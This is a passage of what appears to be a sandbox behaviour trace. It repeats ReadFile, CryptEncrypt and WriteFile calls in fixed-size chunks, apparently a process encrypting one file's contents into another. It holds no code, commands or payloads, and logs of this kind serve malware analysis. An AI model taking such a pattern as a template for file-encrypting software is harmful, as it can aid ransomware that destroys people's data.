pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.637] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.637] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.637] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.639] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.639] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.639] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.639] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.639] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.641] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.641] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.641] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.641] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.641] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.643] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.643] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.643] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.643] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.643] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.643] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.644] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.644] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 